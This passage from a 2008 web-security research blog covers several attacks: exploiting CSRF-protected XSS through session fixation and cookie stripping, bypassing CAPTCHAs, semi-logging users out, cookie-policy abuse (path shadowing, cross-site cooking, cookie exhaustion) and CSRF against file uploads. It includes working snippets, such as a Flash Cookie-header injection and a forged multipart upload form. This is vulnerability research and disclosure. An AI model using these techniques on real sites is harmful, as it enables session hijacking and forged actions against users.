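As a sketch of that precedence logic (in Python rather than PHP, purely for illustration; this mirrors PHP's behaviour when URL session ids are accepted, e.g. via session.use_trans_sid):

```python
def resolve_session_id(cookies, query_params):
    """Toy model of PHP-style session id resolution when URL session ids
    are accepted: a session cookie always wins, and the URL parameter is
    only consulted when no session cookie arrives at all."""
    if "PHPSESSID" in cookies:
        return cookies["PHPSESSID"]       # URL value is completely ignored
    return query_params.get("PHPSESSID")  # no cookie -> URL value is used

# Normal browsing: the victim's cookie takes precedence over anything
# an attacker puts in the URL.
assert resolve_session_id({"PHPSESSID": "victims_id"},
                          {"PHPSESSID": "attackers_id"}) == "victims_id"

# Cookies stripped (RequestRodeo) or deleted (cookie exhaustion): the
# attacker-supplied URL value is accepted instead.
assert resolve_session_id({}, {"PHPSESSID": "attackers_id"}) == "attackers_id"
```

The attack only needs the second branch: once the cookie is out of the picture, the URL carries our session id.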
In our case, no cookie is being sent, since it is either being stripped by RequestRodeo or has been deleted by us, so we can simply supply our session identifier through the URL, attach our CSRF token and XSS payload, and we're done; except in this case the browser still has the user's cookies, and our XSS functions like normal.
The result of this attack is the same as the above if we have deleted the cookies from the user's browser; however, if we have stripped the cookies with RequestRodeo or some similar tool/technique, then we have the further benefit of the user still being logged in when our XSS fires.
Other Cookie Tricks
As I wrote in my post "Understanding Cookie Security", if we have an XSS which is largely unexploitable (except via pure Session Fixation) since it is on a subdomain with no accounts, we can use it to set almost arbitrary cookies for other subdomains.
This gives us a perfect avenue, since we can set the path so that we only overwrite cookies for the single CSRF-protected XSS page, and send the appropriate CSRF token and XSS payload for that page.
Self-Only CSRF Protected Persistent XSS
One case which is much simpler to exploit than the general case, though, is where there are CSRF protections on the form where you submit the actual XSS, but the XSS is a persistent XSS for the user, in that it is rendered on another page (which is itself not CSRF-protected, since it is used to display rather than edit data). Here we can submit the payload into our own account, then log the victim out and log them into our account via CSRF (since very few login forms are CSRF-protected), and our stored payload fires when they view the vulnerable page.
CAPTCHAs As CSRF Protections
CAPTCHAs are not designed to be CSRF protections, and in certain cases are bypassable.
There are essentially two (not completely broken) types of CAPTCHA systems I have seen in widespread use: one where the plaintext is simply stored in the server-side session and the CAPTCHA is included in a form like this:
<img src="captcha.php" />
The other is when a form has a hidden input tag which contains a value which is also inside the image URL, like so:
<input type="hidden" name="captcha_id" value="1234567890" />
<img src="captcha.php?id=1234567890" />
The first system is trivially bypassed for CSRF & CSRF Protected XSS attacks by simply inserting the CAPTCHA onto a page, or inside an iframe (to strip/spoof referers), and asking the user to solve it.
The second can often be trivially bypassed for CSRF & CSRF-protected XSS attacks since the id is usually not user-dependent and the CAPTCHA system does not keep track of which id it sent the user. Therefore the attacker can simply retrieve the appropriate CAPTCHA, solve it, and put the answer along with the corresponding CAPTCHA id in the CSRF or CSRF-protected XSS attack.
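A sketch of why this works, written as Python pseudocode for the vulnerable server-side check (the store, id and plaintext are made up for illustration):

```python
# Hypothetical server-side store mapping CAPTCHA id -> expected plaintext.
captcha_store = {"1234567890": "x7k2p"}

def check_captcha(captcha_id, answer, session):
    # The flaw: the check never consults `session`, so any valid
    # id/answer pair works, not just the one issued to this user.
    return captcha_store.get(captcha_id) == answer

# The attacker fetches captcha.php?id=1234567890 themselves, solves it,
# then embeds the same id and answer in the request the victim sends.
assert check_captcha("1234567890", "x7k2p", session={"user": "victim"})
assert not check_captcha("1234567890", "wrong", session={"user": "victim"})
```

Tying the issued id to the requesting session would close this hole, which is exactly the bookkeeping these systems skip.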
Conclusion
So essentially if we can somehow trick the application into using an attacker's session identifier, either by altering the cookie (e.g. via subdomain tricks, Flash, injecting into Set-Cookie headers, or whatever other trick we can come up with), or by suppressing or deleting the cookie and passing the identifier through another means such as the URL, then all CSRF protected XSSs are exploitable.
However if we cannot, then we can still exploit some scenarios such as self-only CSRF protected persistent XSS if the logout/login functionality is not CSRF-protected (which very few are). And we can also bypass the semi-CSRF protection of CAPTCHAs in several cases.
Labels:
CSRF,
HTTP,
Security (All),
Web App Sec,
XSS
Exploiting Logged Out XSS Vulnerabilities
Usually when we consider vulnerabilities which are only rendered when a user is logged out (e.g. a side bar which renders a vulnerable login form when logged out, and a menu otherwise), the known methods of attack are to first get the user logged out, and then do one of the following:
- Extracting login information from the Password Manager
- Modifying a client-side data store, such as cookies or Flash LSO's to create an attack which fires later when a user is logged in
- Conducting a Session Fixation attack
Some new possibilities for attacking these vulnerabilities are:
- Reading the Browser Cache via XSS
- Semi-Logging the User Out
Reading the Browser Cache via XSS
Most browsers do not let you read pages from the cache unless they have been explicitly marked cacheable via the Expires or Cache-Control headers; Internet Explorer, however, does.
If you use the XmlHttpRequest object in IE to make a request to a resource which has no caching information attached to it, you will simply get back the cached copy, which may contain sensitive information such as the person's billing details, or other juicy information you can use in other exploits.
But since security people have been parroting on about how websites need to make sure they don't let the browser cache anything sensitive (because the user may be using a public computer, etc.), this is much less viable; however, at least we now have a real reason for recommending that people not let the browser cache things.
Semi-Logging the User Out
However before we jump to the conclusion that the vulnerability is only triggered when the user is logged out let us consider what it really means to be "logged in".
To be "logged in" is to send the web application a Cookie header which gets parsed by the server/web application framework (e.g. Apache/PHP), with the parsed value being associated by the application with a valid session.
So conversely, when are you "logged out"? You're logged out whenever the above series of events (plus any other steps I missed) don't fall exactly into place.
So if we start with a user who is currently logged in, instead of logging them out completely via CSRF (or just waiting until they log themselves out), the trick here is to create an exploit which fires when the browser still holds the user's cookies, but the application doesn't receive those cookies intact.
The easiest and most generic place (I found) to attack this chain is to alter what the browser sends, and therefore the server receives.
Until the latest version of Flash (which is 9,0,115,0), the following code ran properly and let us tamper with the Cookie header:
class Attack {
    static function main(mc) {
        var req:LoadVars = new LoadVars();
        req.addRequestHeader("Cookie", "PHPSESSID=junk");
        req.x = "y";
        req.send("http://site.com/page.php?variable=",
                 "_self", "POST");
        // Note: The method must be POST, and must contain
        // POST data, otherwise headers don't get attached
    }
}
Unfortunately this does not work in IE, since IE seems to stop plugins from playing with the Cookie headers it sends.
Furthermore, this does not actually replace the Cookie header which the browser sends; rather, it forces the browser to send an additional Cookie header, which would make the relevant part of the HTTP request look something like this:
Cookie: PHPSESSID=valid_id
Cookie: PHPSESSID=junk
Which PHP (and pretty much every other Server/web application framework) would reconcile into the single PHPSESSID value of:
valid_id, PHPSESSID=junk
This is of course not a valid session token, so the application treats the user as logged out, and our XSS executes as if the user was logged out; however, since the browser still has all the cookies, we can either steal them or get the user to perform actions on our behalf, etc.
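A toy sketch of this header-folding behaviour in Python (exactly how a given server folds repeated headers varies; this just mirrors the comma-joining shown above):

```python
def merge_cookie_headers(headers):
    """Approximate how PHP/Apache fold repeated Cookie headers into one
    comma-joined value before parsing name=value pairs."""
    merged = ", ".join(v for k, v in headers if k.lower() == "cookie")
    # Naive parse: everything after the first '=' becomes the value of
    # the first cookie name -- which is exactly how the garbage session
    # value arises.
    name, _, value = merged.partition("=")
    return {name.strip(): value}

headers = [("Cookie", "PHPSESSID=valid_id"), ("Cookie", "PHPSESSID=junk")]
# The session id the application sees is garbage, so the user is treated
# as logged out even though the browser still holds valid_id.
assert merge_cookie_headers(headers) == {"PHPSESSID": "valid_id, PHPSESSID=junk"}
```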
The less generic, but still working, approach is to overwrite the cookies for your particular path only, either via an XSS on a related subdomain or by abusing a cross-site cooking bug in a browser (check my last post).
Labels:
HTTP,
Javascript,
Security (All),
Web App Sec,
XSS
Understanding Cookie Security
Whenever anyone decides to talk about XSS, one thing which is sure to pop up is the Same Origin Policy, which XSS avoids by being reflected by the server. The Same Origin Policy is the security restriction which makes sure that any pages trying to communicate via JavaScript are on the same protocol, domain and port. However this is misleading, since it is not the weakest link that browsers have between domains.
The weakest link across domains is (for lack of a better term) the cookie policy which determines which domains can set cookies for which domains and which cookies each domain receives.
What's in a cookie
The cookies we use have several fields, including these ones I want to talk about:
- Name
- Value
- Domain
- Path
- Expires
First, it must be noted that the protocol restriction which is explicit in the Same Origin Policy is here implicit, since cookies are an extension to HTTP and so would only be sent over http; however, the distinction between http and https is only enforced if the Secure flag is set.
Secondly, unlike the same origin policy, the cookie policy has no restrictions on ports, explicit or implicit.
And furthermore the domain check is not exact. From RFC 2109:
Hosts names can be specified either as an IP address or a FQHN
string. Sometimes we compare one host name with another. Host A's
name domain-matches host B's if
* both host names are IP addresses and their host name strings match
exactly; or
* both host names are FQDN strings and their host name strings match
exactly; or
* A is a FQDN string and has the form NB, where N is a non-empty name
string, B has the form .B', and B' is a FQDN string. (So, x.y.com
domain-matches .y.com but not y.com.)
Note that domain-match is not a commutative operation: a.b.c.com
domain-matches .c.com, but not the reverse.
Effectively, this means that any subdomain of a given domain can set, and is sent, the cookies for that domain; i.e. news.google.com can set, and is sent, the cookies for .google.com. Furthermore a second subdomain, e.g. mail.google.com, can also set, and is sent, the cookies for .google.com. This effectively means that by setting a cookie for .google.com, news.google.com can force the user's browser to send a cookie to mail.google.com.
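The domain-match rule quoted above is simple enough to state directly; here is a small Python sketch of it (an illustration of the RFC text, not anyone's actual browser code):

```python
def domain_match(host, domain):
    """RFC 2109 domain-match: exact string match, or `domain` starts
    with a dot and is a proper suffix of `host` (so x.y.com matches
    .y.com but not y.com, and the relation is not commutative)."""
    if host == domain:
        return True
    return domain.startswith(".") and host.endswith(domain) and host != domain

assert domain_match("x.y.com", ".y.com")
assert not domain_match("x.y.com", "y.com")     # no leading dot: no match
assert not domain_match("y.com", ".y.com")      # N must be non-empty
assert domain_match("a.b.c.com", ".c.com")      # any depth of subdomain
```

The last assertion is what makes the subdomain tricks above work: every host under .google.com both receives and can set cookies for the parent domain.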
Resolving Conflicts
But what if two cookies of the same name should be sent to a given page, e.g. if there is a cookie called "user" set for mail.google.com and .google.com with different values, how does the browser decide which one to send?
RFC 2109 states that the cookie with the more specific path attribute must be sent first, however it does not define how to deal with two cookies which have the same path (e.g. /) but different domains. If such a conflict occurs then most (all?) browsers simply send the older cookie first.
This means that if we want to overwrite a cookie on mail.google.com from the subdomain news.google.com, and the cookie already exists, then we cannot overwrite the cookie with a path value of / (or whatever the path value of the existing cookie is), but we can override it for every other path, up to the maximum number of cookies allowed per host (50 in IE/Firefox, 30 in Opera); i.e. if we pick 50 (or 30 if we want to target Opera) paths on mail.google.com which encompass the directories and pages we want to overwrite the cookie for, we can simply set 50/30 separate cookies which are all more specific than the existing cookie.
Technically the spec says that a.b.c.d can only set a cookie for a.b.c.d or .b.c.d, but none of the browsers enforce this, since it breaks sites. Also, sites should not be able to set a cookie with a path attribute which would not apply to the current page, but since path boundaries are non-existent in browsers, no-one enforces this restriction either.
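The path-shadowing trick can be sketched as follows (the target paths here are invented for illustration; in a real attack you would enumerate the pages you care about on the victim host):

```python
# Hypothetical target: pages on mail.google.com we want our cookie sent
# to; the real list would depend on the application being attacked.
target_paths = ["/mail/", "/mail/inbox", "/settings"]

def shadowing_set_cookie_headers(name, value, domain, paths):
    """From a subdomain we control, emit one Set-Cookie per target path.
    Each cookie has a more specific path than the victim's existing '/'
    cookie, so browsers send ours first (most specific path first)."""
    return ["Set-Cookie: %s=%s; domain=%s; path=%s" % (name, value, domain, p)
            for p in paths]

headers = shadowing_set_cookie_headers("PHPSESSID", "attackers_id",
                                       ".google.com", target_paths)
# One cookie per path, bounded by the per-host limit (50 in IE/Firefox,
# 30 in Opera).
assert len(headers) == len(target_paths)
assert headers[0].endswith("path=/mail/")
```

The per-host cookie limit is the only real constraint on how much of the site you can shadow this way.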
Cross-Site Cooking
When you think about the problem in the above scenario, you end up asking; can I use the same technique to send a cookie from news.com to mail.com? Or some similar scenario where you are going from one privately owned domain to another in a public registry. The RFC spec did foresee this to some degree and came up with the "one dot rule", i.e. that you can't set a cookie for a domain which does not have an embedded dot, e.g. you cannot set a cookie for .com or .net, etc.
What the spec did not foresee is the creation of public registries such as co.uk which do contain an embedded dot. And this is where the fun begins, since there is no easy solution for this, and the RFC has no standard solution, all the browsers pretty much did their own thing.
IE has the least interesting and most restrictive system: you cannot set a cookie for a two-letter domain of the form ab.xy, or for (com|net|org|gov|edu).xy. Supposedly there is a registry key at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\SpecialDomains which will let you whitelist a domain to allow ab.xy to be set, and my registry has the value "lp. rg." for that key, but I haven't been able to set a cookie for ab.pl or ab.rg, so go figure.
Opera on the other hand has perhaps the most interesting system of all the browser vendors. Opera does a DNS lookup on the domain you are trying to set a cookie for, and if it finds an A record (i.e. the domain has an IP address associated with it) then you can set a cookie for it. So if ab.xy resolves to an IP then you can set a cookie for it; however, this breaks if the TLD itself resolves, as is the case for co.tv.
Firefox 2 seems to have no protections. I was unable to find any protections in the source and was able to get foobar.co.uk to set cookies for .co.uk, so ummm, why does no-one ever mention this? I have no clue....
Firefox 3 on the other hand has a huge list of all the domains for which you cannot set cookies, which you can view online here. Hurray for blacklists.....
Exhausting Cookie Limits
Another interesting aspect of cookies is that there is a limit on how many cookies can be stored, not only per host, but in total, at least in Firefox and Opera. IE doesn't seem to have such a restriction.
In Firefox the global limit is 1000 cookies with 50 per host (1.evil.com and 2.evil.com are different hosts), and on Opera it is 65536 cookies with 30 per host. IE does not seem to have a global limit but does have a host limit of 50 cookies. When you reach the global limit, both browsers go with the RFC recommendation and start deleting cookies.
Both Firefox and Opera simply choose to delete the oldest cookies, and so by setting either 1000 or 65536 cookies depending on the browser, you effectively clear the user's cookie of anything another domain has set.
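A toy model of that eviction behaviour (the jar structure is invented; real browsers obviously track much more per cookie):

```python
from collections import OrderedDict

GLOBAL_LIMIT = 1000  # Firefox's global limit; Opera's would be 65536

class CookieJar:
    """Toy browser cookie jar that evicts the oldest cookie once the
    global limit is reached (the RFC-recommended behaviour)."""
    def __init__(self):
        self.jar = OrderedDict()

    def set(self, domain, name, value):
        key = (domain, name)
        self.jar.pop(key, None)
        if len(self.jar) >= GLOBAL_LIMIT:
            self.jar.popitem(last=False)  # evict the oldest cookie
        self.jar[key] = value

jar = CookieJar()
jar.set("site.com", "PHPSESSID", "victims_id")   # the victim's session
# Attacker floods the jar, spreading cookies over subdomains to dodge
# the 50-per-host limit (i // 50 gives a fresh host every 50 cookies).
for i in range(GLOBAL_LIMIT):
    jar.set("%d.evil.com" % (i // 50), "c%d" % i, "x")
# The victim's cookie has been pushed out entirely.
assert ("site.com", "PHPSESSID") not in jar.jar
```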
Conclusion
By setting the path attribute to point to more specific pages, we can effectively overwrite cookies from any domain that we can set cookies for, which includes all the co.xy domains. Also, if we are attacking Firefox or Opera, we can simply delete the existing cookies if we need to force our cookie to be sent for a path which already has a cookie set (e.g. /).
You may also be able to induce some weird states if you somehow manage to delete only one cookie where an application expects two, or similar, but I doubt that would be very exploitable.
CSRF-ing File Upload Fields
It seems I'm destined to have everything I sit on for a while patched or found and disclosed by someone else, *sigh*, I guess that's the way things go though.
Oh well, pdp has an interesting post over at gnucitizen.org about how to perform CSRF attacks against File upload fields using Flash: http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
Since there would be no point publishing this later, here is the method I came up with a while ago to CSRF file upload fields:
<form method="post" action="http://kuza55.awardspace.com/files.php" enctype="multipart/form-data">
<textarea name='file"; filename="filename.ext
Content-Type: text/plain; '>Arbitrary File
Contents</textarea>
<input type="submit" value='Send "File"' />
</form>
It relies on a bug in Firefox/IE/Safari where form field names are not escaped before being put into the POST body, which lets us inject the filename parameter and Content-Type header.
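To see why the unescaped name works, here is a sketch (in Python) of the multipart/form-data part a browser would build for the textarea above; exactly how each browser assembles the part varies, but the shape of the injection is the same:

```python
# The textarea's name attribute, copied from the form above. The quote
# and CRLF it contains are what break out of the name parameter.
field_name = 'file"; filename="filename.ext\r\nContent-Type: text/plain; '
contents = "Arbitrary File\r\nContents"

# A browser that does not escape the field name produces this part:
part = ('Content-Disposition: form-data; name="%s"\r\n\r\n%s'
        % (field_name, contents))

# The injected quote and CRLF turn an ordinary form field into what the
# server parses as a file upload with our chosen filename and type.
assert 'filename="filename.ext' in part
assert "Content-Type: text/plain" in part
```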
Note: http://kuza55.awardspace.com/files.php is probably vulnerable to a tonne of things; I'm not too worried as it's on free hosting.
Saturday, January 19, 2008
24c3 Presentation and Research
I did a presentation entitled Unusual Web Bugs at 24c3 a few weeks ago, for which you can find slides and video on the first link.
However, since some of the things I presented were some of my own research which I haven't posted anywhere, I'll write a couple of posts about that in the next couple of days. There isn't too much though, so there's no need to get your hopes up, and if you've seen the video, you already know it.
[EDIT]P.S. Any comments or criticisms about the presentation would be greatly appreciated[/EDIT]
Labels:
Conferences,
General Security,
Security (All),
Web App Sec